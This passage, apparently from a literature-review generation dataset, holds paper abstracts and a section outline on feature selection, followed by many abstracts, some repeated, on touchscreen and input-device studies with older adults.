for instance selection as instantiations. We describe specific examples of instantiations of this framework and discuss their strengths and weaknesses. Then, we outline an enhanced framework for instance selection, generic sampling, and summarize example evaluation results for several different instantiations of its implementation. Finally, we conclude with open issues and research challenges for instance selection as well as focusing in general. --- paper_title: Advances in Instance Selection for Instance-Based Learning Algorithms paper_content: The basic nearest neighbour classifier suffers from the indiscriminate storage of all presented training instances. With a large database of instances classification response time can be slow. When noisy instances are present classification accuracy can suffer. Drawing on the large body of relevant work carried out in the past 30 years, we review the principle approaches to solving these problems. By deleting instances, both problems can be alleviated, but the criterion used is typically assumed to be all encompassing and effective over many domains. We argue against this position and introduce an algorithm that rivals the most successful existing algorithm. When evaluated on 30 different problems, neither algorithm consistently outperforms the other: consistency is very hard. To achieve the best results, we need to develop mechanisms that provide insights into the structure of class definitions. We discuss the possibility of these mechanisms and propose some initial measures that could be useful for the data miner. --- paper_title: Subspace clustering for high dimensional data: a review paper_content: Subspace clustering is an extension of traditional clustering that seeks to find clusters in different subspaces within a dataset. Often in high dimensional data, many dimensions are irrelevant and can mask existing clusters in noisy data. Feature selection removes irrelevant and redundant dimensions by analyzing the entire dataset. Subspace clustering algorithms localize the search for relevant dimensions allowing them to find clusters that exist in multiple, possibly overlapping subspaces. There are two major branches of subspace clustering based on their search strategy. Top-down algorithms find an initial clustering in the full set of dimensions and evaluate the subspaces of each cluster, iteratively improving the results. Bottom-up approaches find dense regions in low dimensional spaces and combine them to form clusters. This paper presents a survey of the various subspace clustering algorithms along with a hierarchy organizing the algorithms by their defining characteristics. We then compare the two main approaches to subspace clustering using empirical scalability and accuracy tests and discuss some potential applications where subspace clustering could be particularly useful. --- paper_title: Toward integrating feature selection algorithms for classification and clustering paper_content: This paper introduces concepts and algorithms of feature selection, surveys existing feature selection algorithms for classification and clustering, groups and compares different algorithms with a categorizing framework based on search strategies, evaluation criteria, and data mining tasks, reveals unattempted combinations, and provides guidelines in selecting feature selection algorithms. With the categorizing framework, we continue our efforts toward-building an integrated system for intelligent feature selection. A unifying platform is proposed as an intermediate step. An illustrative example is presented to show how existing feature selection algorithms can be integrated into a meta algorithm that can take advantage of individual algorithms. An added advantage of doing so is to help a user employ a suitable algorithm without knowing details of each algorithm. Some real-world applications are included to demonstrate the use of feature selection in data mining. We conclude this work by identifying trends and challenges of feature selection research and development. --- paper_title: Feature selection for classification: A review paper_content: Nowadays, the growth of the high-throughput technologies has resulted in exponential growth in the harvested data with respect to both dimensionality and sample size. The trend of this growth of the UCI machine learning repository is shown in Figure 1. Efficient and effective management of these data becomes increasing challenging. Traditionally manual management of these datasets to be impractical. Therefore, data mining and machine learning techniques were developed to automatically discover knowledge and recognize ... ---
Title: Feature Selection: A Literature Review Section 1: Introduction Description 1: Provide an overview of the increase in high-dimensional data, the challenges it poses for machine learning methods, and the importance of feature selection in data preprocessing. Section 2: State of Art Description 2: Discuss the various feature selection methods proposed in the literature and the difficulty of comparing them due to the challenges posed by the nature of the datasets. Section 3: Defining Feature Relevance Description 3: Explain the concept of feature relevance and classify features as irrelevant, weakly relevant, or strongly relevant, with definitions and graphical representation. Section 4: Feature Selection Description 4: Explain the process of feature selection, including the steps of subset generation, subset evaluation, stopping criteria, and result validation. Section 5: Categorization and Characteristics of Feature Selection Algorithms Description 5: Present a three-dimensional categorization framework for feature selection algorithms, based on search strategy, evaluation criteria, and data mining tasks. Section 6: Data Mining Tasks Description 6: Discuss the space of characteristics of feature selection algorithms according to their criteria, including search organization, successor generation, and evaluation measure. Section 7: Application of Feature Selection in Real World Description 7: Provide examples and applications of feature selection in areas such as text categorization, remote sensing, intrusion detection, genomic analysis, and image retrieval. Section 8: Forward vs Backward Selection Description 8: Compare forward selection and backward selection methods for feature selection, discussing their pros and cons. Section 9: Feature Selection with Large Dimensional Data Description 9: Discuss feature selection challenges and solutions in the context of large-dimensional data, including scalability issues and proposed approaches. Section 10: Subspace Searching and Instance Selection Description 10: Explore the concept of subspace searching and instance selection in the context of clustering, with references to existing algorithms and future research opportunities. Section 11: Feature Selection with Sparse Data Matrix Description 11: Address the challenges of feature selection in sparse data matrices commonly encountered in business and web technologies, and the need for efficient algorithms. Section 12: Scalability and Stability of Feature Selection Description 12: Discuss the importance of scalability and stability in feature selection algorithms, particularly for large datasets and online classifiers. Section 13: Conclusion Description 13: Summarize the key points of the review, including definitions, procedures, approaches, advantages, and challenges in feature selection, and provide insights into future research directions.
Interaction techniques for older adults using touchscreen devices: a literature review
12
--- paper_title: Studying Point-Select-Drag Interaction Techniques for Older People with Cognitive Impairment paper_content: Graphical user interfaces and interactions that involve pointing to items and dragging them are becoming more common in rehabilitation and assistive technologies. We are currently investigating interaction techniques to understand point-select-drag interactions for older people with cognitive impairment. In particular, this study reports how older perform such tasks. Significant differences in behavior between all of the interaction techniques are observed and the reasons for these differences are discussed according the cognitive impairment. --- paper_title: Design and Development of a Mobile Medical Application for the Management of Chronic Diseases: Methods of Improved Data Input for Older People paper_content: The application of already widely available mobile phones would provide medical professionals with an additional possibility of outpatient care, which may reduce medical cost at the same time as providing support to elderly people suffering from chronic diseases, such as diabetes and hypertension. To facilitate this, it is essential to apply user centered development methodologies to counteract opposition due to the technological inexperience of the elderly. In this paper, we describe the design and development of a mobile medical application to help deal with chronic diseases in a home environment. The application is called MyMobileDoc and includes a graphical user interface for patients to enter medical data including blood pressure; blood glucose levels; etc. Although we are aware that sensor devices are being marketed to measure this data, subjective data, for example, pain intensity and contentment level must be manually input. We included 15 patients aged from 36 to 84 (mean age 65) and 4 nurses aged from 20 to 33 (mean age 26) in several of our user centered development cycles. We concentrated on three different possibilities for number input. We demonstrate the function of this interface, its applicability and the importance of patient education. Our aim is to stimulate incidental learning, enhance motivation, increase comprehension and thus acceptance. --- paper_title: Aging, motor control, and the performance of computer mouse tasks paper_content: Because of the increased presence of computers in work and everyday life and the demographic "graying" of America, there is a need for interface designs that promote accessibility for older people. This study examined age differences in the performance of basic computer mouse control techniques. An additional goal of the study was to examine the influence of age-related changes in psychomotor abilities on mouse control. A total of 60 participants in 3 age groups (20--39 years, 40--59 years, and 60--75 years) performed 4 target acquisition tasks (pointing, clicking, double-clicking, and dragging) using a computer mouse. The data indicated that the older participants had more difficulty performing mouse tasks than the younger participants. Differences in performance attributable to age were found for the more complex tasks (clicking and double-clicking). Furthermore, age-related changes in psychomotor abilities were related to age differences in performance. We discuss applications to computer interface des... --- paper_title: Exploring the accessibility and appeal of surface computing for older adult health care support paper_content: This paper examines accessibility issues of surface computing with older adults and explores the appeal of surface computing for health care support. We present results from a study involving 20 older adults (age 60 to 88) performing gesture-based interactions on a multitouch surface. Older adults were able to successfully perform all actions on the surface computer, but some gestures that required two fingers (resize) and fine motor movement (rotate) were problematic. Ratings for ease of use and ease of performing each action as well as time required to figure out an action were similar to that of younger adults. Older adults reported that the surface computer was less intimidating, less frustrating, and less overwhelming than a traditional computer. The idea of using a surface computer for health care support was well-received by participants. We conclude with a discussion of design issues involving surface computing for older adults and use of this technology for health care. --- paper_title: Use of Computer Input Devices by Older Adults paper_content: A sample of 85 seniors was given experience (10 trials) playing two computer tasks using four input devices (touch screen, enlarged mouse [EZ Ball], mouse, and touch pad). Performance measures assessed both accuracy and time to complete components of the game for these devices. As well, participants completed a survey where they evaluated each of the devices. Seniors also completed a series of measures assessing visual memory, visual perception, motor coordination, and motor dexterity. Overall, previous experience with computers had a significant impact on the type of device that yielded the highest accuracy and speed performance, with different devices yielding better performance for novices versus experienced computer users. Regression analyses indicated that the mouse was the most demanding device in terms of the cognitive and motor-demand measures. Discussion centers on the relative benefits and perceptions regarding these devices among senior populations. --- paper_title: Studying Point-Select-Drag Interaction Techniques for Older People with Cognitive Impairment paper_content: Graphical user interfaces and interactions that involve pointing to items and dragging them are becoming more common in rehabilitation and assistive technologies. We are currently investigating interaction techniques to understand point-select-drag interactions for older people with cognitive impairment. In particular, this study reports how older perform such tasks. Significant differences in behavior between all of the interaction techniques are observed and the reasons for these differences are discussed according the cognitive impairment. --- paper_title: Investigation of Input Devices for the Age-differentiated Design of Human-Computer Interaction: paper_content: Demographic change demands new concepts for the support of computer work by aging employees. In particular, computer interaction presents a barrier due to a lack of experience and age-specific changes in performance. This article presents a study in which different input devices (mouse, touch screen and eye-gaze input) were analyzed regarding their usability and according to age diversity. Furthermore, different Hybrid Interfaces that combine eye-gaze input with additional input devices were investigated. --- paper_title: Usability of touch-panel interfaces for older adults. paper_content: The usability of a touch-panel interface was compared among young, middle-aged, and older adults. In addition, a performance model of a touch panel was developed so that pointing time could be predicted with higher accuracy. Moreover, the target location to which a participant could point most quickly was determined. The pointing time with a PC mouse was longer for the older adults than for the other age groups, whereas there were no significant differences in pointing time among the three age groups when a touch-panel interface was used. Pointing to the center of a square target led to the fastest pointing time among nine target locations. Based on these results, we offer some guidelines for the design of touch-panel interfaces and show implications for users of different age groups. Actual or potential applications of this research include designing touch-panel interfaces to make them accessible for older adults and predicting movement times when users operate such devices. --- paper_title: Basic senior personas: a representative design tool covering the spectrum of European older adults paper_content: The persona method is a powerful approach to focus on needs and characteristics of target users, keeping complex user data,numbers and diagrams alive during the whole design cycle.However, the development of prosperous personas requires a considerable amount of time, effort and specific skills. This paper introduces the development of a set of 30 basic senior personas, covering a broad range of characteristics of European older adults, following a quantitative development approach. The aim of this tool is to support researchers and developers in extending empathy for their target users when developing ICT solutions for the benefit of older adults. The main innovation lies in the representativeness of the basic senior personas. The personas build on multifaceted quantitative data from a single source including micro-level information from roughly 12,500 older individuals living in different European countries. The resulting personas may be applied in their basic form but are extendable to specific contexts. Also, the suggested tool addresses the drawbacks of current existing personas describing older adults: being representative and cost-efficient. The basic senior personas, a filter tool, a manual and templates for "persona marketing" articles are available for free online under http://elderlypersonas.cure.at. --- paper_title: Aging, motor control, and the performance of computer mouse tasks paper_content: Because of the increased presence of computers in work and everyday life and the demographic "graying" of America, there is a need for interface designs that promote accessibility for older people. This study examined age differences in the performance of basic computer mouse control techniques. An additional goal of the study was to examine the influence of age-related changes in psychomotor abilities on mouse control. A total of 60 participants in 3 age groups (20--39 years, 40--59 years, and 60--75 years) performed 4 target acquisition tasks (pointing, clicking, double-clicking, and dragging) using a computer mouse. The data indicated that the older participants had more difficulty performing mouse tasks than the younger participants. Differences in performance attributable to age were found for the more complex tasks (clicking and double-clicking). Furthermore, age-related changes in psychomotor abilities were related to age differences in performance. We discuss applications to computer interface des... --- paper_title: Exploring the accessibility and appeal of surface computing for older adult health care support paper_content: This paper examines accessibility issues of surface computing with older adults and explores the appeal of surface computing for health care support. We present results from a study involving 20 older adults (age 60 to 88) performing gesture-based interactions on a multitouch surface. Older adults were able to successfully perform all actions on the surface computer, but some gestures that required two fingers (resize) and fine motor movement (rotate) were problematic. Ratings for ease of use and ease of performing each action as well as time required to figure out an action were similar to that of younger adults. Older adults reported that the surface computer was less intimidating, less frustrating, and less overwhelming than a traditional computer. The idea of using a surface computer for health care support was well-received by participants. We conclude with a discussion of design issues involving surface computing for older adults and use of this technology for health care. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Investigating familiar interactions to help older adults learn computer applications more easily paper_content: Many older adults wish to gain competence in using a computer, but many application interfaces are perceived as complex and difficult to use, deterring potential users from investing the time to learn them. Hence, this study looks at the potential of 'familiar' interface design which builds upon users' knowledge of real world interactions, and applies existing skills to a new domain. Tools are provided in the form of familiar visual objects, and manipulated like real-world counterparts, rather than with buttons, icons and menus found in classic WIMP interfaces. ::: ::: This paper describes the formative evaluation of computer interactions that are based upon familiar real world tasks, which support multitouch interaction, involves few buttons and icons, no menus, no right-clicks or double-clicks and no dialogs. Using an example of an email client to test the principles of using "familiarity", the initial feedback was very encouraging, with 3 of the 4 participants being able to undertake some of the basic email tasks with no prior training and little or no help. The feedback has informed a number of refinements of the design principles, such as providing clearer affordance for visual objects. A full study is currently underway. --- paper_title: Comparison between single-touch and multi-touch interaction for older people paper_content: This paper describes a study exploring the multi-touch interaction for older adults. The aim of this experiment was to check the relevance of this interaction versus single-touch interaction to realize object manipulation tasks: move, rotate and zoom. For each task, the user had to manipulate a rectangle and superimpose it to a picture frame. Our study shows that adults and principally older adults had more difficulties to realize these tasks for multi-touch interaction than for single-touch interaction. --- paper_title: Investigation of Input Devices for the Age-differentiated Design of Human-Computer Interaction: paper_content: Demographic change demands new concepts for the support of computer work by aging employees. In particular, computer interaction presents a barrier due to a lack of experience and age-specific changes in performance. This article presents a study in which different input devices (mouse, touch screen and eye-gaze input) were analyzed regarding their usability and according to age diversity. Furthermore, different Hybrid Interfaces that combine eye-gaze input with additional input devices were investigated. --- paper_title: A Study of Pointing Performance of Elderly Users on Smartphones paper_content: The number of global smartphone users is rapidly increasing. However, the proportion of elderly persons using smartphones is lower than that of other age groups because they feel it is difficult to use touch screens. There have only been a few studies about usability and elderly smartphone users or designs for them. Based on this background, we studied the pointing action of elderly users, which is a basic skill required to use touch screens on smartphones. We reviewed previous works to determine specific research methods and categorized them into three groups: (a) effect of target size and spacing on touch screen pointing performance, (b) effect of age on pointing performance, and (c) feedback of touch screens. To investigate the touch screen pointing performance of elderly, we conducted two experiments. In the first experiment, 3 target sizes (5 mm, 8 mm, and 12 mm) and 2 target spacings (1 mm, 3 mm) were evaluated. Adding to that, we analyzed whether touch screen pointing performance is dependent on th... --- paper_title: Evaluating swabbing: a touchscreen input method for elderly users with tremor paper_content: Elderly users suffering from hand tremor have difficulties interacting with touchscreens because of finger oscillation. It has been previously observed that sliding one's finger across the screen may help reduce this oscillation. In this work, we empirically confirm this advantage by (1) measuring finger oscillation during different actions and (2) comparing error rate and user satisfaction between traditional tapping and swabbing in which the user slides his finger towards a target on a screen edge to select it. We found that oscillation is generally reduced during sliding. Also, compared to tapping, swabbing resulted in improved error rates and user satisfaction. We believe that swabbing will make touchscreens more accessible to senior users with tremor. --- paper_title: Age-related differences in performance with touchscreens compared to traditional mouse input paper_content: Despite the apparent popularity of touchscreens for older adults, little is known about the psychomotor performance of these devices. We compared performance between older adults and younger adults on four desktop and touchscreen tasks: pointing, dragging, crossing and steering. On the touchscreen, we also examined pinch-to-zoom. Our results show that while older adults were significantly slower than younger adults in general, the touchscreen reduced this performance gap relative to the desktop and mouse. Indeed, the touchscreen resulted in a significant movement time reduction of 35% over the mouse for older adults, compared to only 16% for younger adults. Error rates also decreased. --- paper_title: The elderly interacting with a digital agenda through an RFID pen and a touch screen paper_content: Ambient Assisted Living (AAL) aims to enhance quality of life of elder and impaired people. Thanks to the advances in Information and Communication Technologies (ICT), it is now possible not only to support new home services to improve their quality of life, but also to provide them with more natural, simple and multimodal interaction styles. It enables introducing new better-suited interaction styles for performing tasks according to user need, abilities and the usage conditions. In this paper, a digital agenda application is described and tested by a group of elderly users. This customized personal agenda allows elders to create agenda entries, to view calendar entries and a person's telephone without typing any letter or number. Through observation and the capture of data we studied how six participants (ages from 66 to 74) interacted with the personal agenda through a touch screen and an RFID-based interface. The RFID interaction consisted of a sheet-like physical object' the RFID board', and a pen-like object 'the IDBlue pen' that the users used to choose the desired option in the board. Beside the users' satisfaction, interesting results have been found that make us aware of valuable information to enhance their interaction with the digital world, as well as, their quality of life. Moreover, it is shown how a pen-like object and a sheet-like one can be used by the elderly to interact with the digital world. --- paper_title: Gestural interfaces for elderly users: Help or hindrance paper_content: In this paper we investigate whether finger gesture input is a suitable input method, especially for older users (60+) with respect to age-related changes in sensory, cognitive and motor abilities. We present a study in which we compare a group of older users to a younger user group on a set of 42 different finger gestures on measures of speed and accuracy. The size and the complexity of the gestures varied systematically in order to find out how these factors interact with age on gesture performance. The results showed that older users are a little slower, but not necessarily less accurate than younger users, even on smaller screen sizes, and across different levels of gesture complexity. This indicates that gesture-based interaction could be a suitable input method for older adults. At least not a hindrance - maybe even a help. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. --- paper_title: Design and Development of a Mobile Medical Application for the Management of Chronic Diseases: Methods of Improved Data Input for Older People paper_content: The application of already widely available mobile phones would provide medical professionals with an additional possibility of outpatient care, which may reduce medical cost at the same time as providing support to elderly people suffering from chronic diseases, such as diabetes and hypertension. To facilitate this, it is essential to apply user centered development methodologies to counteract opposition due to the technological inexperience of the elderly. In this paper, we describe the design and development of a mobile medical application to help deal with chronic diseases in a home environment. The application is called MyMobileDoc and includes a graphical user interface for patients to enter medical data including blood pressure; blood glucose levels; etc. Although we are aware that sensor devices are being marketed to measure this data, subjective data, for example, pain intensity and contentment level must be manually input. We included 15 patients aged from 36 to 84 (mean age 65) and 4 nurses aged from 20 to 33 (mean age 26) in several of our user centered development cycles. We concentrated on three different possibilities for number input. We demonstrate the function of this interface, its applicability and the importance of patient education. Our aim is to stimulate incidental learning, enhance motivation, increase comprehension and thus acceptance. --- paper_title: Aging, motor control, and the performance of computer mouse tasks paper_content: Because of the increased presence of computers in work and everyday life and the demographic "graying" of America, there is a need for interface designs that promote accessibility for older people. This study examined age differences in the performance of basic computer mouse control techniques. An additional goal of the study was to examine the influence of age-related changes in psychomotor abilities on mouse control. A total of 60 participants in 3 age groups (20--39 years, 40--59 years, and 60--75 years) performed 4 target acquisition tasks (pointing, clicking, double-clicking, and dragging) using a computer mouse. The data indicated that the older participants had more difficulty performing mouse tasks than the younger participants. Differences in performance attributable to age were found for the more complex tasks (clicking and double-clicking). Furthermore, age-related changes in psychomotor abilities were related to age differences in performance. We discuss applications to computer interface des... --- paper_title: Tap or touch?: pen-based selection accuracy for the young and old paper_content: The effect of the decline in cognitive, perceptive, and motor abilities on older adults' performance with input devices has been well documented in several experiments. None of these experiments, however, have provided information on the challenges faced by older adults when using pens to interact with handheld computers. To address this need, we conducted a study to learn about the performance of older adults in simple pen-based tasks with handheld computers. The study compared the performance of twenty 18-22 year olds, twenty 50-64 year olds, and twenty 65-84 year olds. We found that for the most part, older adults were able to complete tasks accurately. An exception occurred with the low accuracy rates achieved by 65-84 year old participants when tapping on targets of the same size as the standard radio buttons, checkboxes, and icons on the PocketPC. An alternative selection technique we refer to as "touch" enabled 65-84 year olds to select targets more accurately. This technique did not negatively affect the performance of the other participants. If tapping to select, making standard-sized targets 50 percent larger provided 65-84 year olds with similar advantages to switching to "touch" interactions. The results suggest that "touch" interactions need to be further explored to understand whether they will work in more realistic situations. --- paper_title: Exploring the accessibility and appeal of surface computing for older adult health care support paper_content: This paper examines accessibility issues of surface computing with older adults and explores the appeal of surface computing for health care support. We present results from a study involving 20 older adults (age 60 to 88) performing gesture-based interactions on a multitouch surface. Older adults were able to successfully perform all actions on the surface computer, but some gestures that required two fingers (resize) and fine motor movement (rotate) were problematic. Ratings for ease of use and ease of performing each action as well as time required to figure out an action were similar to that of younger adults. Older adults reported that the surface computer was less intimidating, less frustrating, and less overwhelming than a traditional computer. The idea of using a surface computer for health care support was well-received by participants. We conclude with a discussion of design issues involving surface computing for older adults and use of this technology for health care. --- paper_title: Text entry on handheld computers by older users paper_content: Small pocket computers offer great potential in workplaces where mobility is needed to collect data or access reference information while carrying out tasks such as maintenance or customer support. This paper reports on three studies examining the hypothesis that data entry by older workers is easier when the pocket computer has a physical keyboard, albeit a small one, rather than a touchscreen keyboard. Using a counter-balanced, within-subjects design the accuracy and speed with which adults over 55 years of age could make or modify short text entries was measured for both kinds of pocket computer. The keyboard computer was the Hewlett Packard 360LX (HP), but the touch-screen computers varied across studies (experiment 1: Apple Newton™ and PalmPilot™; experiment 2: Philips Nino™; experiment 3: Casio E10™). All studies showed significant decrements in accuracy and speed when entering text via the touch-screen. Across studies, most participants preferred using the HP's small physical keyboard. Even after a... --- paper_title: A Study on the Icon Feedback Types of Small Touch Screen for the Elderly paper_content: Small touch screens are widely used in applications such as bank ATMs, point-of-sale terminals, ticket vending machines, facsimiles, and home automation in the daily life. It is intuition-oriented and easy to operate. There are a lot of elements that affect the small screen touch performance. One of the essential parts is icon feedback. However, to merely achieve beautiful icon feedback appearance and create interesting interaction experience, many interface designers ignore the real user needs. It is critical for them to trade off the icon feedback type associated with the different users needs in the touch interaction. This is especially important when the user capability is very limited. This paper described a pilot study for identifying factors that determine the icon feedback usability on small touch screen in four older adult Cognitrone groups since current research aimed mostly at general icon guidelines and recommendations and failed to consider and define the specific needs of small touch screen interfaces for the elderly. In this paper, we presented a concept from the focus on human necessity and use a cognitive assessment tool, which is, Cognitrone test, to measure older adult's attention and concentration capability and learn more about how to evaluate and design suitable small screen icon feedback types. Forty-five elder participants were participated. Each subject was asked to complete a battery of Cognitrone tests and divided into 4 groups. Each subject was also requested to perform a set of `continuous touch' usability tasks on small touch screen and comment on open-ended questions. Results are discussed with respect to the perceptual and cognitive factors that influence older adults in the use of icon feedback on small touch screen. It showed significant associations between icon feedback performance and factors of attention and concentration. However, this interrelation was much stronger for the Group 2 and Group 4, especially for Type B, Type C and Type G. Moreover, consistent with previous research, older participants were less sensitive and required longer time to adapt to the high-detailed icon feedback. These results are discussed in terms of icon feedback design strategies for interface designers. --- paper_title: Slipping and drifting: using older users to uncover pen-based target acquisition difficulties paper_content: This paper presents the results of a study to gather information on the underlying causes of pen -based target acquisition difficulty. In order to observe both simple and complex interaction, two tasks (menu and Fitts' tapping) were used. Thirty-six participants across three age groups (18-54, 54-69, and 70-85) were included to draw out both general shortcomings of targeting, and those difficulties unique to older users. Three primary sources of target acquisition difficulty were identified: slipping off the target, drifting unexpectedly from one menu to the next, and missing a menu selection by selecting the top edge of the item below. Based on these difficulties, we then evolved several designs for improving pen-based target acquisition. An additional finding was that including older users as participants allowed us to uncover pen-interaction deficiencies that we would likely have missed otherwise. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Design pattern TRABING: touchscreen-based input technique for people affected by intention tremor paper_content: Tremor patients are frequently facing problems when interacting with IT systems and services. They do not reach the same levels of input efficiency and easily become unhappy with a technology they do not perceive as a general asset. Cases of Intention tremor show a significant comparative rise in inaccurate movement towards a real button or virtual buttons on touch screens, as this particular tremor increases its symptoms when approaching a desired physical target. People suffering from this specific tremor have been identified as the target group. This group has been closely investigated and thus, a new input procedure has been developed which may be used on standard touch screens. The new technique enables users, accordingly tremor patients, to fully operate IT-based systems and therefore possess full control over input. Deviations caused by the tremor are compensated with a continuous movement instead of a single targeted move which remains the most difficult task to the user. Also, the screen surface will present a frictional resistance, which significantly hinders tremor symptoms. Input can be identified by the computer system with high accuracy, by means of special heuristics, which support barrier free access beyond the target group. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency. However, careful observations identified several typical problems that should be addressed in future interfaces. We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. --- paper_title: Use of Computer Input Devices by Older Adults paper_content: A sample of 85 seniors was given experience (10 trials) playing two computer tasks using four input devices (touch screen, enlarged mouse [EZ Ball], mouse, and touch pad). Performance measures assessed both accuracy and time to complete components of the game for these devices. As well, participants completed a survey where they evaluated each of the devices. Seniors also completed a series of measures assessing visual memory, visual perception, motor coordination, and motor dexterity. Overall, previous experience with computers had a significant impact on the type of device that yielded the highest accuracy and speed performance, with different devices yielding better performance for novices versus experienced computer users. Regression analyses indicated that the mouse was the most demanding device in terms of the cognitive and motor-demand measures. Discussion centers on the relative benefits and perceptions regarding these devices among senior populations. --- paper_title: Investigation of Input Devices for the Age-differentiated Design of Human-Computer Interaction: paper_content: Demographic change demands new concepts for the support of computer work by aging employees. In particular, computer interaction presents a barrier due to a lack of experience and age-specific changes in performance. This article presents a study in which different input devices (mouse, touch screen and eye-gaze input) were analyzed regarding their usability and according to age diversity. Furthermore, different Hybrid Interfaces that combine eye-gaze input with additional input devices were investigated. --- paper_title: A Study of Pointing Performance of Elderly Users on Smartphones paper_content: The number of global smartphone users is rapidly increasing. However, the proportion of elderly persons using smartphones is lower than that of other age groups because they feel it is difficult to use touch screens. There have only been a few studies about usability and elderly smartphone users or designs for them. Based on this background, we studied the pointing action of elderly users, which is a basic skill required to use touch screens on smartphones. We reviewed previous works to determine specific research methods and categorized them into three groups: (a) effect of target size and spacing on touch screen pointing performance, (b) effect of age on pointing performance, and (c) feedback of touch screens. To investigate the touch screen pointing performance of elderly, we conducted two experiments. In the first experiment, 3 target sizes (5 mm, 8 mm, and 12 mm) and 2 target spacings (1 mm, 3 mm) were evaluated. Adding to that, we analyzed whether touch screen pointing performance is dependent on th... --- paper_title: Evaluating swabbing: a touchscreen input method for elderly users with tremor paper_content: Elderly users suffering from hand tremor have difficulties interacting with touchscreens because of finger oscillation. It has been previously observed that sliding one's finger across the screen may help reduce this oscillation. In this work, we empirically confirm this advantage by (1) measuring finger oscillation during different actions and (2) comparing error rate and user satisfaction between traditional tapping and swabbing in which the user slides his finger towards a target on a screen edge to select it. We found that oscillation is generally reduced during sliding. Also, compared to tapping, swabbing resulted in improved error rates and user satisfaction. We believe that swabbing will make touchscreens more accessible to senior users with tremor. --- paper_title: Age-related differences in performance with touchscreens compared to traditional mouse input paper_content: Despite the apparent popularity of touchscreens for older adults, little is known about the psychomotor performance of these devices. We compared performance between older adults and younger adults on four desktop and touchscreen tasks: pointing, dragging, crossing and steering. On the touchscreen, we also examined pinch-to-zoom. Our results show that while older adults were significantly slower than younger adults in general, the touchscreen reduced this performance gap relative to the desktop and mouse. Indeed, the touchscreen resulted in a significant movement time reduction of 35% over the mouse for older adults, compared to only 16% for younger adults. Error rates also decreased. --- paper_title: Usability evaluation of numeric entry tasks on keypad type and age. paper_content: Abstract This study investigated the effects of age and two keypad types (physical keypad and touch-screen one) on the usability of numeric entry tasks. Twenty four subjects (12 young adults 23–33 years old and 12 older adults 65–76 years old) performed three types of entry tasks: 4-digit, 4-digit of password type, and 11-digit. The dependent variables for the performance were mean entry time per unit stroke and error rate. Subjective ratings for ease of use of each keypad type were collected after the experiment. The mean entry time per unit stroke of the young adults was significantly smaller than that of the older adults. The older adults had significantly different mean entry times per unit stroke on the two keypad types. The error rates between young and older adults were significantly different for the touch-screen keypad. The subjective ratings showed that the participants preferred the touch-screen keypad to the physical keypad. The results showed that the older adults preferred the touch-screen keypad and could operate more quickly, and that tactile feedback is needed for the touch-screen keypad to increase input accuracy. The results of this study can be applied when designing different information technology products to input numbers using one hand. Relevance to industry Touch-screen technology is increasingly used in ticketing Kiosks used in public places such as airports, stations or theaters, and in automated teller machines (ATMs) and cash dispensers (CDs). This paper can be applied to design these products or systems, particularly considering usability improvements for older adults. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. --- paper_title: Exploring the accessibility and appeal of surface computing for older adult health care support paper_content: This paper examines accessibility issues of surface computing with older adults and explores the appeal of surface computing for health care support. We present results from a study involving 20 older adults (age 60 to 88) performing gesture-based interactions on a multitouch surface. Older adults were able to successfully perform all actions on the surface computer, but some gestures that required two fingers (resize) and fine motor movement (rotate) were problematic. Ratings for ease of use and ease of performing each action as well as time required to figure out an action were similar to that of younger adults. Older adults reported that the surface computer was less intimidating, less frustrating, and less overwhelming than a traditional computer. The idea of using a surface computer for health 